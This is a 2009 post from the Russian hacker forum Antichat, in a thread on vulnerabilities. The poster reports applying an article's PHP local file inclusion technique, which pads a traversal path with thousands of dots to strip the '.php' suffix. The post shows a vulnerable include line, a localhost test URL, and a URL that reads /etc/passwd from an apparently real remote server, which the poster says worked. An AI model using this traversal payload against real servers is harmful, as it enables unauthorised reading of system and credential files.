HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #12  
Старый 02.03.2009, 04:26
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Блин, сегодня на практике применил эту статью , а так бы забил на тот серв с инклюдом и magic quotes on.

Все работает.

на локалхосте тестировал - Win XP, PHP 5.2.4 и апач 2 (денвер 3)

PHP код:
<?php   include($_GET.'.php');   ?>
http://localhost/testinc.php?file=favicon.ico[225 точек ] работает.

а потом на удаленном серваке (Линукс, точная версия и ПО неизвестно мне)

http://www.site/~papka1/papka2/Papka3/papka4/script.phtml?page=../../../../../../../../etc/passwd[4015 точек минимальное значение] работает.

Респект вам всем)
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.